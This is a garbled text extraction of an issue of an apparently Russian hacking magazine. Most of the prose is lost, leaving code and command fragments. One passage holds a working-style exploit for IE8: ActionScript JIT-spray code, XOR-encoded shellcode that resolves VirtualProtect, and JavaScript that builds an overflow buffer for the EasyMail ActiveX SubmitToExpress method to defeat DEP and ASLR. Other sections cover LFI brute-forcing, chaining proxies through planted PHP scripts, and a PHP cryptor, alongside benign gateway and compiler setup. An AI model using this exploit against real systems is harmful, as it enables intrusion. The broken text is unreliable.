nottrusted.com/gotcha.xml#xss)
,
,
U+2212. best-fit,
U+002D, ,
CSS-, XSS-.
,
.
, .
,
JavaScript ,
, SQL-.
,
.

. ,
. ,
X 05 /136/ 10
:
1.

.
2. NFC
,
.
3. .
,
.
,
,
. :). ,
,

. .
:
ABC
ASCII:
\x41\x42\x43
Unicode:
\x41\x00\x42\x00\x43\x00
- ,

ASCII-,
. , -

.
, Unicode-
. (Chris Anley),
, .
,

venetian exploit.
-, ,
, , .

. , ,
,
, ,
.
(
) ,
.

,
,

, UTF-8,
, ..

XSS
.
,
, ,
. ,
.
, .
,
, , ,
.
HAPPY END?!
, ,

. .
,
, .
, . ,
,

. ,

.
,
.z
063

, Digital Security dookie@inbox.ru
JIT SPRAY
IE8
JIT-
hardware DEP ASLR IE8

JIT Spray. , JIT-,
, , - .

,
ASLR+DEP IE8 . Aurora,
Google,
IE,
IE6/IE7.
, 2010
BlackHat DC 2010 ,
ASLR, DEP IE8. ,
,
,
.
,
. Immunity
Canvas
Aurora IE8
Windows 7. , -,
.
.
PREVIOUSLY ON ][.
][,
,
hardware DEP.
064

.
ActiveX,
,
. ,
ActiveX emsmtp.dll
QuikSoft EasyMail.

SubmitToExpress().
256 ,
,
ESI, SEH.
cccc260ccccAAAAffffBBBBfffffffff
fffffffffffffffffffffffDDDD
ESI = AAAA
RET = BBBB
SEH = DDDD
IE8 !
IE8 hardware DEP.

.
,
DEP iexplore. Heap Spray
. .
, IE.
Flash,
.
, . DEP .
, IE8 permanent
DEP. DEP
SetProcessDEPPolicy,
NtSetInformationProcess. DEP.
NtSetInformationProcess
Access Denied.
ASLR,
, . 256 .
JIT SPRAY
.
(Dionysus Blazakis)
BlackHat DC 2010 , DEP ASLR
IE8.
- , , . ,
,
X 05 /136/ 10
Permanent DEP
permanent DEP? JIT-,

. JIT-
ActionScript.
AS ,
SWF-. Flash ,
IE8. ,
, , .
Flash , .

, . ,
. ActionScript ,

cmd.exe. .
, ActionScripte
var ret=(0x3C909090^0x3C909090^0x3C909090^0x
3C909090^ );
:
0x1A1A0100:
0x1A1A0105:
0x1A1A010A:
0x1A1A010F:
359090903C
359090903C
359090903C
359090903C
XOR
XOR
XOR
XOR
EAX,
EAX,
EAX,
EAX,
3C909090
3C909090
3C909090
3C909090
? 0x35 XOR EAX,

.

, , , , :
0x1A1A0101:
0x1A1A0102:
0x1A1A0103:
0x1A1A0104:
0x1A1A0106:
0x1A1A0107:
0x1A1A0108:
0x1A1A0109:
90 NOP
90 NOP
90 NOP
3C35 CMP AL, 35
90 NOP
90 NOP
90 NOP
3C35 CMP, AL 35
0x3C , ,
CMP AL. ,
XOR EAX 0x35. , XOR , NOP ,
NOP .
,
ActionScript.
.
,
. , Flash
? ASLR,
. . -,
X 05 /136/ 10
JIT-,
HeapSpray.
, .
ASLR, .
100% Windows XP SP3
, Windows 7. -,
ActionScript
.
XP SP3, .
, ,
. ,
Tamarin (
Flex SDK),
SWFTOOLS.
, :
, MetaSploit, .
. JIT- XOR EAX.
.
XOR.
.
, , ,
. . ,
:
1. (, MetaSploit)
ActionScript.
2.
.
3. JIT-Spray. JIT .
4. JIT-Spray.
5. JIT VirtualProtect.
6. JIT VirtualProtect
.
7. JIT ,
MetaSploit.
ActionScript.
, HeapSpray. ,
, \x11\x22\x33\
x44, AS : \u2211\
u4433. (
),
perl AS.
,
JIT- , , .
Dictionary.
Dictionary -,
. :
HTTP://WWW
links
HeapSpray
Flash:
roeehay.
blogspot.com/2009/08/
exploitation-ofcve-2009-1869.html

:
semantiscope.com/
research/BHDC2010/
BHDC-2010-Paper.pdf

JIT-SPRAY :
dsecrg.com/pages/pub/
show.php?id=22
SWFTOOLS:
swftools.org
var dict = new Dictionary();

var key = "key";
065

dict[key] = "Value1";
dict["key"] = "Value2";

()
, .
, key . 32 ,
3 , 29 .
.
Integer, 29 ,
3 . ActionScript
, .
Dictionary, ,

,
.
,
, ,
. .
Dictionary
,
.
( :)).
var shellcode="shellcode";
var even = new Dictionary();
var odd = new Dictionary();
//
for (i = 0; i < (1024 * 1024 * 8);
i += 1) {
even[i * 2] = i;
odd[i * 2 + 1] = i;
}
//
even[shellcode] = 1;
odd[shellcode] = 1;
,
, .
for (curr in even) {
//
if (curr == shellcode)
{ break; } //
evenPrev = curr;
}
for (curr in odd) {
066
if (curr == shellcode)
{ break; }
oddPrev = curr;
}
Dictionary
, , .

, ,
17 , (

-).
.
//ptr

if (evenPrev < oddPrev) {
ptr = evenPrev;
if (evenPrev+8+9 != oddPrev)
{ //
return 0;
}
} else {
ptr = oddPrev;
if (oddPrev+8+9 != evenPrev) {
return 0;
}
}
ptr = (ptr + 1) * 8;//
3 8:
(ptr<<3)+8
,
12, .
JIT Spray! , SWF
. ,
.
, , Flash .
,
.
JavaScript .
function pageLoadEx(){
var ldr = new Loader();
var url = "jit_s0.swf";
// JIT-
var urlReq = new
URLRequest(url);
ldr.load(urlReq);
childRef = addChild(ldr);
}
function pageLoad(){
for(var z=0;z<600;z++) {
pageLoadEx();
X 05 /136/ 10
} // 600
ic=ic + 1;
MyTextField1.text=ic +
"- JIT spraying, wait for 4 ...";
if (ic == 4) {
//4 600
clearInterval(ldInt);
MyTextField1.text = ic +
"- done, calling sploit...";
ExternalInterface.call(
"exploit", ptr);
//
}
}
ldInt=setInterval(pageLoad,3500);
//

. :
JIT-, ,
,
.
: JIT
,
ASCII-,

. ,
.
. , 0x01FF001A.
.
: 0x606F6061 0x616F606A.

. [0x60..0x6F]
. JIT ((0x606F60610x60606060)<<4)+(0x616F606A-0x60606060)=
0x01FF001A. ,
8 , retn 8.
, :
var bf=unescape("%63");
// ...260...cccccc
DDDD
var value=targetValue;
3
: retn, retn 4 retn 8.
,
12 . . ,
SWF JIT-
,

.
,
,
0x1000 .
0x010000
. 0x1000 ,

. ASLR,
.
0x1A1A0101.
0x1A1A0000,
,
, JIT-. Flash,
. :
value=decimalToHex(value,8,16);
//

var h11="%6"+value.substring(0,1);
//
var high=h41+h31+h21+h11;
var low =h42+h32+h22+h12;
//
while (buf.length<260) buf=buf+bf;
buf+=unescape("%0a%0a%1a%1a");
// ESI 0
buf+="ffff"+unescape("%01%01%1a%1a");
// = 0x1A1A0101 JIT
buf+=unescape(high); //if ret
buf+=unescape(high); //if ret 4
buf+=unescape(high); //if ret 8 (
var buf="";
emsmtp.dll - ret 8)
buf+=unescape(low);
// 16-
buf+=unescape(low);
function decimalToHex(d,l,rad) {
buf+=unescape(low);
var hex = Number(d).toString(rad);
cccc260ccccAAAAffffBBBBCCCCCCCCCCCCDDDDDDDDDDDD
alert('Try me on 0x' + decimalToH
while (hex.length < l) {

hex = "0" + hex;
ex(targetValue,8,16)+' :-)');
vuln.SubmitToExpress(buf); //
ESI = AAAA 0,
JIT-spray
RET = BBBB JIT
X 05 /136/ 10
return hex;
}
//
function exploit2(targetValue){
function exploit(targetValue) {
067

JIT , PUSH'a
setTimeout('exploit2('+targetValue+')',5000);
//
}
JIT-SPRAY
JIT-. ,
.
1. 0x7F.
, , XOR
, .
0x00 0x7F.
2. , (JNE/JE, ), Z .
,
XOR. XOR CMP, , ,
Z . ,
(
XOR), , Z 0x7F
. ADD, SUB, XOR, OR, AND .. . AL 0,
Z . ,
PUSH 0x6A.
:
0x1A1A0110: 803F6E
0x1A1A0113: 6A35
0x1A1A0115: 75EF
CMP [EDI], 'n'

PUSH 35
jnz short
3. ,
. 4 ,
XOR 0x35. AL AH.
0x1A1A0110:
0x1A1A0115:
0x1A1A0117:
0x1A1A011a:
0x1A1A011c:
0x1A1A011F:
0x1A1A0121:
B80035B1A1
3C35
B063C4
3C35
B163C3
3C35
50 PUSH EAX
MOV
CMP
MOV
CMP
MOV
CMP
EAX, 0xA1B13500
AL, 35
AL, C4
AL, 35
AH, C4
AL, 35
, .
, . ,
.
function funcXOR1()
{
var jit=(0x3c909090^0x3c909090^ .. // NOP
0x3c44ec83^ // 3583ec443c
sub esp, 44 ;

0x3c90C033^ // 3533C0903c
xor eax, eax
0x3c9030b0^ // 35b030903c
mov AL,
0x3c008b64^ // 35648b003c
mov eax, fs:[eax]
0x3c0c408b^ // 358b400c3c
mov eax,
fs:[eax+C]
0x3c1c408b^ // 358b401c3c
mov eax,
fs:[eax+1C]
0x3c08508b^ // 358b50083c
NEXT: mov edx,
0x3c20788b^ // 358b78203c
mov edi,
30
[eax+08]
[eax+20] ;
3. . , PUSH 0xA1B1C3C4.
5 , 6 XOR,
068
0x3c90008b^ // 358b00903c
mov eax, [eax]
0x6a6b3f80^ // 35803f6b6a
cmp [edi], 'k' ;
k? "kern"
X 05 /136/ 10
0x3c90eA75^ // 3575eA903c
jnz short
0x3c904747^ // 354747903c
inc edi, inc edi ;
NEXT:

0x3c90016a^ // 356a01903c push 01 ;
Unicode
//
//
//
0x3cd3ff57^ // 3557ffd33c
0x3c90e7ff); // ,

0x3cb89090^ // 359090b83c mov eax, 3c ..

0x3c900000^ // 350000903c
. 0x40 ,
3500000
0x3c9063b0^ // 35b063903c mov ah, 'c'
function Loadzz2(){ var ret1 = funcXOR1();}
0x3c5074b4^ // 35b474503c mov al, 't' and push "ct\0\0"

// 4
"Virt ualP rote ct\0\0"
// , ,
,
0x3c5cc483^ // 3583c45c3c add esp, 5c ;

0x3c909058^ // 355890903c pop eax ;
0x3c08c483^ // 3583c4083c add esp, 08 ;

0x3cb9905a^ // 355a90b93c pop edx ;
0x3c906060^ // 356060903c
0x3c9060b1^ // 35b160903c
0x3c9060b5^ // 35b560903c ecx 0x60606060
0x3c90c12b^ // 352bc1903c sub eax, ecx
0x3c90d12b^ // 352bd1903c sub edx, ecx ;
0x3c04e0c1^ // 35c1e0043c shl eax, 4 ;

0x3c90c203^ // 3503c2903c add eax,edx ;
0x3c90388b^ // 358b38903c mov edi, [eax] ;

0x3c08c783^ // 3583c7083c add edi, 8 ; 8
0x3c406a54^ // 35546a403c push esp and push 40 ;

X 05 /136/ 10
,
NOP XOR. ,
,
,
0x1000 = 4000 . 800 ,
NOP, XOR .
.
. ,
JIT , ,
.
DEP IE8, ,
. :
1. .
2. perl.
3. , 'my' 'our'.
3. AS : perl shellcodegen.pl shellcode_file > jit-spray.as
4. SWF : as3compiler X 320 Y 300 M Loadzz1 jitspray.as
5. , . ,
, Flash.
6. HTML SWF WEB .
, ActiveX
. ,
IE8, .
PDF . z
069

icq 884888
X-TOOLS

: LIBrute
: WINDOWS 2000/2003/XP/VISTA/7
: [X26]VOLAND
. ,
LFI http://site.com/index.
php?page=news&lang=[]%00,
:
1. URL: http://site.com/index.
php?page=news;
2. : GET;
3. : lang;
4. : {STR}%00;
5. : .
:)
: https://
forum.antichat.ru/thread49775.html.
: HTTPREQ
: WINDOWS 2000/2003/XP/
VISTA/7
: [X26]VOLAND

,
Local File
HttpREQ.
Include,
InetCrack
][ .

, [x26]VOLAND .

:
HTTP GUI-;
.

:
;
GUI;
SSL;
HTTPS;
;
(HTTP/HTTPS);
;
;
URL Decimal ;
;

;
;
4 (Query String, GET, POST,
COOKIE);
;
;
2 (
HttpREQ
);
;
;
;
,

;
;
URL Host
;
;
URL;
POST-
; (Content-length);
Url

Hex ( SQL-).
User-Agent;
070
!
HTTP;

MIME-;
HTTP-;

;
-;

;
;
;

;
.NET Framework > 2.0;
-
HttpREQ,
https://forum.
antichat.ru/thread121239.html.
: WINDOWS UNLOCKER
: WINDOWS 2000/2003/XP/
VISTA/7
: DJFLY
win.lock,
Windows
SMS NNNN, ,

(
).
X 05 /136/ 10

DjFly
Windows unlocker.
:
1. (

);
2. ;
3. ;
4. ;
5. IE DrWeb
CureIt ( );
6. ;
7.
;
8.
;
9.
(
);
10. ( );
11. (
);
12. ;
13. *.scr ;
14. hosts.
, , : CD/
DVD/USB , WinUnlocker.exe,
autorun.inf:
[AutoRun]
UseAutoPlay=1
shellexecute=WinUnlocker.exe
action= Windows unlocker
action=@WinUnlocker.exe
label=Windows unlocker
icon=WinUnlocker.exe
Shell\cmd1= Windows
unlocker
Shell\cmd1\Command = WinUnlocker.exe
: DICHECKER
: WINDOWS 2000/2003/XP/VISTA/7
: PROXY-BASE.ORG
.
, DiChecker Socks 4/5
HTTP Proxy-,
X 05 /136/ 10
PHP-

. ,
.
:

;
;
( );
URL (
);
( );
.
proxy-base.org.
: PPROXY
: *NIX/WIN
: BONS
-
-, , -, pproxy.
, pproxy : , PHP (pproxy.php), ,
Perl (plocal.pl),
HTTP-.
. , pproxy.php http://
site.com/proxy/pproxy.php,

( 8008):
perl plocal.pl -px http://site.com/
proxy/pproxy.php
: - pproxy.
php (http://site1.com/proxy/pproxy.php http://
site2.com/proxy/pproxy.php),

:
perl plocal.pl -px http://site1.com/
proxy/pproxy.php
perl plocal.pl -px http://site2.
com/proxy/pproxy.php -tpx http://
localhost:8008 -bp 8009
8009
localhost site1.com
site2.com target.

Tor.
Tor+Privoxy (
8118):
perl plocal.pl -px http://site.
com/proxy/pproxy.php -tpx http://
localhost:8118
,
,
pproxy.php:
$secret = 'pproxypass';
plocal.pl :
perl plocal.pl -px http://site.com/
proxy/pproxy.php -pwd pproxypass
pproxy , Delphi/Pascal
.
: XXTEA CRYPTOR
: *NIX/WIN
: OZA
XXtea Cryptor php-,

php-
xxtea, base64.
XXtea
XTEA, 1998
.
64
,
,
32- (
http://ru.wikipedia.org/wiki/
XXTEA).

,
. z
071

Mifrill maria.nefedova@glc.ru
,
?. ,
, , ,
, ,
, ,
\ , .
,
, ,
.
, IT-
,
, ,
. , ,
:
IT-
, .
, ?
:
,
, .
,
,
. ,
,
074
072

,
.
,

.

, ,
(-,
,
).

,
,
.
, , , ,
-,
. ,

IT .

,
, 15 !
. .
, ,
,
.
,
, .

,
,
-
.
, IT
.
-,

(Oracle, Microsoft, Cisco ..), ,
,

. ,

IT-, , .
, ,
.
? ,
-, ,
X 05 /136/ 10

, .
, , ,
, ,
.
, (,
, ).
-,
, IT- , 5-7

X 05 /136/ 10
. -, :).
, ,
,
,

profit.
, ,
: ,
. ,

.
,
.

,
.
, .
,
IT-
-
. ,

- , (Microsoft, Red
hat, HP, Cisco, Oracle ).
073
MS.
, ? ,
,
,
. ,
, ,
, .
,
,
,
Sun
Certified Developer For Java Web Services
, .
,
,
,
,
.
IT-
-.

, .
,
( ),
, -
,
, ,
.
, IT- , ,
.

.
MICROSOFT
,
. ,
, , (
) ,
.
MS :
:
,
, ,
,
Microsoft;
074
- LPI LEVEL 2
: ,

,
;
:

Microsoft;
:
,
, .

.
,
Office 2007 Microsoft SQL
Server 2008 .
,
www.
microsoft.com/Rus/Learning/MCP/Default.mspx
RED HAT

, Red Hat, , .
40
, .
Red
Hat Enterprise Linux, Red Hat Linux Fedora
Core, .
Red Hat
:
Red Hat Certified Technician (RHCT);
Red Hat Certified Engineer (RHCE);
Red Hat Certificates of Expertise;
Red Hat Certified Security Specialist (RHCSS);
Red Hat Certified Datacenter Specialist
(RHCDS);
Red Hat Certified Architect (RHCA).
, Red Hat
,
,

Red Hat. ,
, ,
.

Red Hat : www.europe.
redhat.com/training

.
MICROSOFT.
LINUX
PROFESSIONAL
INSTITUTE (LPI)

Linux Professional Institute (LPI).
GNU/Linux GNU/Linux-, - ,
.

. :
LPIC Level 1
:
101: General Linux I;
102: General Linux II.
LPIC Level 2
:
201: Advanced Administration;
202: Linux Optimization.
, :
LPIC Level 3
:
321: Windows Integration;
322: Internet Server;
323: Database Server;
324: Security, Firewalls, Encryption;
325: Kernel Internals & Device drivers;
Creating distribution packages;
32x: .

: www.lpi.org.
CISCO
Cisco Systems
80% ,

.
Cisco
X 05 /136/ 10

CISCO.
,
. ,
Cisco .
Microsoft ,
:
Entry, Associate, Professional, Expert,
Specialist.

CCIE (Expert).
:
Routing & Switching, Design, Network Security,
Service Provider, Storage Networking, Voice,
Wireless.
Cisco ,
( , )
. ,
.

: www.cisco.com/web/go/
certifications
COMPTIA (Computing
Technology Industry
Association)

CompTIA. ,
, 28-
.
CompTIA
:
CompTIA A+ ( ,
IT-);
CompTIA Network+;
CompTIA Security+;
CompTIA Server+;
CompTIA Linux+;
CompTIA PDI+;
CompTIA RFID+;
CompTIA Convergence+;
CompTIA CTT+;
CompTIA CDIA+;
CompTIA Project+.
,

IT Fundamentals,
X 05 /136/ 10
EC-COUNCIL.
,
.
ADOBE
, ,
IT IT for Sales,
Green IT,
.
: www.comptia.org
ORACLE
Oracle
Sun Microsystems, Oracle ,
, Java .

: Certified Associate,
Certified Professional, Certified Master, Special
Accreditation, Certified Expert Program
Certified Specialist.
,
, ,
, ,

: www.education.
oracle.com/pls/web_prod-plq-dad/db_pages.
getpage?page_id=39
1C
1
. ,
IT- . , ,
1 ,
, , .
, , :).
1: ,

1:.
1: 8
1: 7.7.
: www.1c.ru/prof/
prof.htm
,
,
.
Adobe Systems Incorporated, ,
,

.
Adobe :
Adobe Certified Expert (ACE), Adobe Certified
Associate (ACA) Adobe Certified Instructor
(ACI).
ACE -
Adobe, ACA ,

Adobe, ACI, ,
.
: www.adobe.com/support/
certification
, ,
,
,

.
, 99% , ,
,
, , , ,
. , , ,
,
-
.

,
,
,
,
075
EXCEL 2000

.

:
. .. : www.
specialist.ru;
,
& Softline Academy: www.ituniversity.ru.
,
, . ,
Thomson Prometric: www.prometric.com VUE:
www.vue.com.
,
,

, .

, ,
, , ,
, . ,
strike back, .
COPMTIA
,
(
),
, , .

.
, ,
,
.
,
IT
IT, . ,

, ,
-
.
, COMPTIA
076
,
, , IELTS:
International English Language Testing
System, TOEFL:
Test of English as a Foreign Language.
:
www.ielts.org
: www.toefl.org
,
- ,
.
Mensa

.
,

,

, IQ , 98%
. , ,
, 100 .
- :).
: www.mensa.org

(Certified Ethical Hacker), International Council of E-Commerce
Consultants (EC-Council).
,
, , ,
.
,
: www.eccouncil.
org/certification/certified_ethical_hacker.aspx z
X 05 /136/ 10
UNIXOID
grinder grinder@ua.fm
Windows
*nix-,
,
.
, , , .
*nix, .
, .

Windows
Firewall Internet Connection Sharing (
) ,
. ,
, , , ,
UserGate Proxy & Firewall, NetworkShield
Firewall Kerio WinRoute Firewall. ,
,
, .

, ,
. ,
078
(, ,
, ). .

. ,
,
,

,
Windows Firewall, .

, ,

. ,
, DNS
(,
IDS, VPN IP-PBX). ,

,
Linux
,
BSD . , OpenBSD
,
32-64 300 , ,
, ,
.
PF
OpenBSD iptables Linux.
VirtualBox (virtualbox.org),
.
QEMU,
Virtual PC . :
X 05 /136/ 10
VirtualBox
VMware Server ( ),
VMware Player.

,

, VirtualBox Bridged Networking
Driver.
(TCP/IP) Microsoft.
, VirtualBox,
DNS- IP-
(LAN) , (vic1 OpenBSD
eth1 Linux).
Microsoft.
.

(, Wi-Fi), . ,
.
, ,
.
PACKET FILTER

:
# sysctl net.inet.ip.forwarding=1
,
/etc/sysctl.conf.

NAT, pf.conf:
# vi /etc/pf.conf
nat on vic0 from vic1:network to any -> vic0
block in all
pass in on vic1
, vic1, .
.
:
# pfctl -nf /etc/pf.conf
# pfctl -vf /etc/pf.conf
X 05 /136/ 10

PF,

IP-. NAT, :
# pfctl -s state

IP ( )
nmap . , ,
,
:
# vi /etc/pf.conf
tcp_srv = "{ ssh, smtp, domain, www, pop3 }"
udp_srv = "{ domain }"
block all
pass out inet proto tcp to any port $tcp_srv
pass out inet proto udp to any port $udp_srv
/etc/services
, .
pfctl
:
WARNING
warning

VirtualBox
ISO
OpenBSD (install46.
iso),

,
.
# pfctl -s info

ntop pftop. PKG_PATH FTP- (www.
openbsd.org/ftp.html), :
# export PKG_PATH=ftp://ftp.openbsd.org/pub/
OpenBSD/4.6/packages/i386
HTTP://WWW
links
VirtualBox
www.virtualbox.org
FTP
OpenBSD www.
openbsd.org/ftp.html
:
# pkg_add pftop
# pkg_add ntop
Dnsmasq
thekelleys.org.uk/
dnsmasq

,

- Squid.
079
UNIXOID
OpenBSD ,
# pkg_add squid-2.7.STABLE6.tgz
/etc/squid/
squid.conf :
# vi /etc/squid/squid.conf
http_port 3128
### :
# http_port 127.0.0.1:3128 transparent
### IP
acl lan_net src 192.168.1.0/24

###
192.168.1.0/24
http_access allow lan_net
###
, VM
cache_mem 32 MB
maximum_object_size 10240 KB
cache_dir ufs /var/squid/cache 5000 16 256
:
# squid -z
# squid
,
:
# netstat -ant | grep 3128

3128 vnec1
-. , , ,
80 8080
web-, ,
Squid:
# vi /etc/pf.conf
table <clients> { 192.168.1.2,
192.168.1.5 }
table <nocache> { 192.168.1.0/24 }
rdr on inet proto tcp from <clients>
to ! <nocache> port { 80 8080 } ->
127.0.0.1 port 3128
, Squid :
# vi /etc/rc.local
if [ -x /usr/local/sbin/squid ]; then
echo -n 'squid'; /usr/local/sbin/squid
fi
# pkg_add privoxy
,
8118,
http://config.privoxy.org/ ( : http://p.p).
-.
Cookies, pop-up,
. Privoxy
,
LAN
listen-address config.txt, IP
vic1:
listen-address 191.168.1.1:8118
Squid . squidGuard
(www.squidguard.org) HAVP (HTTP Anti Virus
Proxy, www.server-side.de).
,
,
.
# pkg_add squidguard
# pkg_add havp
IPTABLES
iptables -F ,
iptables -t nat -flush NAT
iptables -L
080
squidGuard HAVP ,
][ 2008
, .
,
,
. ,
,
. -
. ,
Squid, Privoxy (Privacy Enhancing Proxy, privoxy.
org)
-.
Privoxy
:
, , Privoxy
,
, ][ 03.2007.
,
squid.conf
:
cache_peer 127.0.0.1 parent \
8118 7 no-query
DNS ( TFTP
DHCP) Dnsmasq (thekelleys.org.uk/
dnsmasq). :
X 05 /136/ 10
sysctl.conf
# pkg_add dnsmasq
dnsmasq.conf ,
:
listen-address=127.0.0.1, 192.168.1.1
DNS-
.
IPSEC OPENBSD
VPN.
IPsec ipsecctl, . ,
192.168.1.0/24, WAN
IP- 1.2.3.4,
LAN - 192.168.2.0/24 WAN 5.6.7.8.
/etc/ipsec.conf :
# vi /etc/ipsec.conf
ike esp from 192.168.1.0/24 to 192.168.2.0/24 \
peer 5.6.7.8
ike esp from 1.2.3.4 to 192.168.2.0/24 \
peer 5.6.7.8
ike esp from 1.2.3.4 to 5.6.7.8
# vi /etc/pf.conf
set skip on { lo vic1 enc0 }
pass quick on vic0 from 5.6.7.8
VPN-
/etc/isakmpd/pubkeys/ipv4/5.6.7.8, /etc/isakmpd/
private/local.pub 5.6.7.8. :
# isakmpd -K
# ipsecctl -f /etc/ipsec.conf
,
( ).
/etc/rc.conf.local :
INFO
info
Ubuntu Server 9.10

192
1
(ubuntu.
com/products/
whatisubuntu/
serveredition/
techspecs).
isakmpd="-K"
C OpenBSD, , . Linux,
, , .
NAT LINUX
Linux Netfilter
iptables. , , , .
:

,
,

,

][
2009 .
# echo 1 > /proc/sys/net/ipv4/ip_forward
/etc/ipsec.conf ,
IP
passive, , ( ):
ike passive esp from 5.6.7.8 to 1.2.3.4
PF
, ,
,
:
X 05 /136/ 10
:
# sysctl -w net.ipv4.ip_forward=1
,
/etc/sysctl.conf:
net.ipv4.ip_forward = 1
, sysctl
OpenBSD. -
081
UNIXOID
down.d). , /
etc/networks/interfaces :
# vi /etc/networks/interfaces
###
pre-up iptables-restore < /etc/

iptables.rules
CentOS :
# service iptables save
/etc/
sysconfig/iptables.
/etc/sysconfig/
iptables-config:
# vi /etc/sysconfig/iptables-config
IPTABLES_SAVE_ON_STOP="yes"
IPTABLES_SAVE_ON_RESTART="yes"
Privoxy -
.
CentOS/Fedora
:
# system-config-securitylevel
# iptables -t nat -A POSTROUTING -o

eth0 -j MASQUERADE
# iptables -A FORWARD -i eth0 -o eth1
-m state --state RELATED,ESTABLISHED
-j ACCEPT
# iptables -A FORWARD -i eth1 -o eth0
-j ACCEPT
iptables
:
# iptables -L -v
, .
. Squid . Debian/
Ubuntu:
# apt-get install squid
# service iptables status

chkconfig.
iptables:
# chkconfig --list iptables
:
# chkconfig iptables on
( )
eth1, eth0. NAT
Linux ,
:

:
iptables -A OUTPUT -j ACCEPT -m state
--state NEW,ESTABLISHED,RELATED -o
eth0 -p tcp -m multiport --dports
80,443,8080 --sport 1024:65535
# yum install squid
,
iptables:
NAT ,
Ubuntu iptables
iptables-save:
iptables -t nat -A PREROUTING -i eth1

-p tcp -m tcp --dport 80 -j DNAT --todestination 192.168.1.1:3128
# iptables-save > /etc/iptables.rules
iptables -t nat -A PREROUTING -i eth0

-p tcp -m tcp --dport 80 -j REDIRECT
--to-ports 3128
, (,
/etc/network/if-post-
PFCTL
pfctl -f /etc/pf.conf pf.conf
pfctl -nf /etc/pf.conf
pfctl -Nf /etc/pf.conf NAT
pfctl -Rf /etc/pf.conf
pfctl -sn NAT
pfctl -sr
pfctl -ss
pfctl -si
pfctl -sa
082
CentOS:
Squid Adzapper (adzapper.sf.net),

squidGuard HAVP.

,
Windows ,
. ,
- ,
, .

, .z
X 05 /136/ 10
zobnin@gmail.com

ccache distcc

. , ,
( BSD Gentoo).
, .
,
, .
,
, .

.
X 05 /136/ 10
,
.
,
.

~/.bashrc:
export CFLAGS='-O0'
export CXXFLAGS=$CFLAGS
FreeBSD Gentoo /etc/make.conf :
083
UNIXOID
gcc, g++, cc c++ distcc
ccache -s
ccache FreeBSD
CFLAGS='-O0'
CXXFLAGS='-O0'
OpenBSD /etc/mk.conf.
,
, . , ,
, - ,
, ,
.

.
,
- .
make , . Make
'-j',
( ,
, ). ,

. , , '-j' . ,
, .
,
2.
'-j'
:
$ ./configure
$ make -j5
$ sudo make install
, , , .
, Gentoo make MAKEOPTS /etc/make.conf. FreeBSD
MAKE_ARGS.
source based
, 10%.
, ,
, tmpfs.
, .
/var/tmp, tmpfs. Gentoo:
$ sudo mount -t tmpfs tmpfs -o size=1G,nr_inodes=1M
/var/tmp/portage
,
(2 ), tmpfs swap,
.
,
.

.
, , ,
.
,
,
.
ccache.
ccache ,
. ,
, ,
.
Ccache .
.
ccache

:
$ CC="ccache gcc" CXX="ccache g++" ./configure
084
X 05 /136/ 10
Samba
ccache
distccmon-gnome

~/.ccache.
1 ,
4 :
ccache.
ccache genkernel, :
$ ccache -M 4G

, ccache
:
$ echo "export CCACHE_DIR=\"/var/tmp/
ccache/\"" >> ~/.bashrc
:
$ rm -rf ~/.ccache
$ ln -s /var/tmp/ccache ~/.ccache
$ sudo genkernel --kernel-cc=/usr/lib/

ccache/bin/gcc --menuconfig all
FreeBSD ,
:
1. ccache:
$ cd /usr/ports/devel/ccache
$ sudo make install clean
2. /etc/make.conf:
$ sudo vi /etc/make.conf
ccache ,
. ,
, , , .
ccache . ,

. ccache:
Gentoo FreeBSD.
ccache Gentoo
:
1. ccache:
$ sudo emerge -av ccache
# NO_CACHE
, ccache
.if !defined(NO_CACHE)
CC=/usr/local/libexec/ccache/world-cc
CCX=/usr/local/libexec/ccache/world-c++
.endif
# ccache
.if ${.CURDIR:M*/ports/devel/ccache}
NO_CCACHE=yes
.endif
# ccache
FEATURES="ccache"
#
CCACHE_DIR="/var/tmp/ccache/"
#
CCACHE_SIZE="4G"
X 05 /136/ 10
info

Gentoo

(. /etc/
portage/package.
cflags).

ccache
distcc .

PORTAGE_NICENESS
/etc/make.
conf
Gentoo
,

.
2. ~/.cshrc ( ~/.bashrc):
$ sudo vi ~/.cshrc
2. /etc/make.conf:
INFO
# ccache
setenv PATH /usr/local/libexec/ccache:$PATH
setenv CCACHE_PATH /usr/bin:/usr/local/bin
setenv CCACHE_DIR /var/tmp/ccache
setenv CCACHE_LOGFILE /var/log/ccache.log
#
if ( -x /usr/local/bin/ccache ) then
ccache
distcc
.
Gentoo

,

FEATURES="ccache
distcc" /etc/
make.conf.
085
UNIXOID
/usr/local/bin/ccache -M 4G > /dev/null

endif
ccache make install clean:
, ,
distcc-config ( ,
DISTCC_HOSTS):
$ sudo distcc-config --set-hosts "127.0.0.1
192.168.0.1 192.168.0.2 192.168.0.3"
$ sudo make NO_CACHE=yes install clean

.
( ),
,
. ,
distcc.
Distcc gcc,

. , distcc

- . ,
-
.
distcc
. ,
, ,
. , ,
.
- . , ,
Linux, *BSD, Solaris Windows ( gcc
distcc cygwin), gcc
.
distcc , .
Gentoo FreeBSD
. Gentoo
distcc, .
distcc :
$ sudo emerge distcc
- /etc/make.
conf:
#
MAKEOPTS="-j8"
# distcc
FEATURES="distcc"
# distcc
DISTCC_DIR="/tmp/.distcc"
MAKEOPTS . :
/ * 2 + 1.
, , , ,
.
086
IP- DNS- .
,
, . ,
192.168.0.1 , : 192.168.0.1/5.
.
/etc/conf.d/distccd,
, :
DISTCCD_OPTS="${DISTCCD_OPTS} -allow 192.168.0.0/24"
:
$ sudo rc-update add distccd default
$ sudo /etc/init.d/distccd start
distcc. distcc, :
$ sudo genkernel --kernel-cc=distcc all
Gentoo, FreeBSD , distcc,

. distcc
:
$ cd /usr/ports/devel/distcc
$ sudo make install clean
, . distcc /etc/rc.conf ,

:
distccd_enable="YES"
distccd_flags="--nice 5 --allow 192.168.1.0/24
--daemon --user distcc -P /var/run/distccd.pid"
,
( , ). '--allow' ,
. :
$ sudo /usr/local/etc/rc.d/distccd start
. /etc/make.conf
:
# vi /etc/make.conf
# distcc
CC = distcc
CXX = distcc
#
MAKE_ARGS =- j8
distcc CC CXX,
X 05 /136/ 10
,
gcc g++:
#
#
#
#
#
#
mkdir -p /usr/local/lib/distcc/bin
cd /usr/local/lib/distcc/bin
ln -s /usr/local/bin/distcc gcc
ln -s /usr/local/bin/distcc g++
ln -s /usr/local/bin/distcc cc
ln -s /usr/local/bin/distcc c++
/root/.cshrc
:
. - ssh
distcc, :
# ssh-keygen -t dsa -f /etc/distcc/.ssh/id_dsa
(id_dsa.pub)
/etc/distcc/.ssh/authorized_keys , .
ssh portage , . - :
# chown -R distcc:daemon /etc/distcc
# chmod 644 /etc/distcc/.ssh/authorized_keys
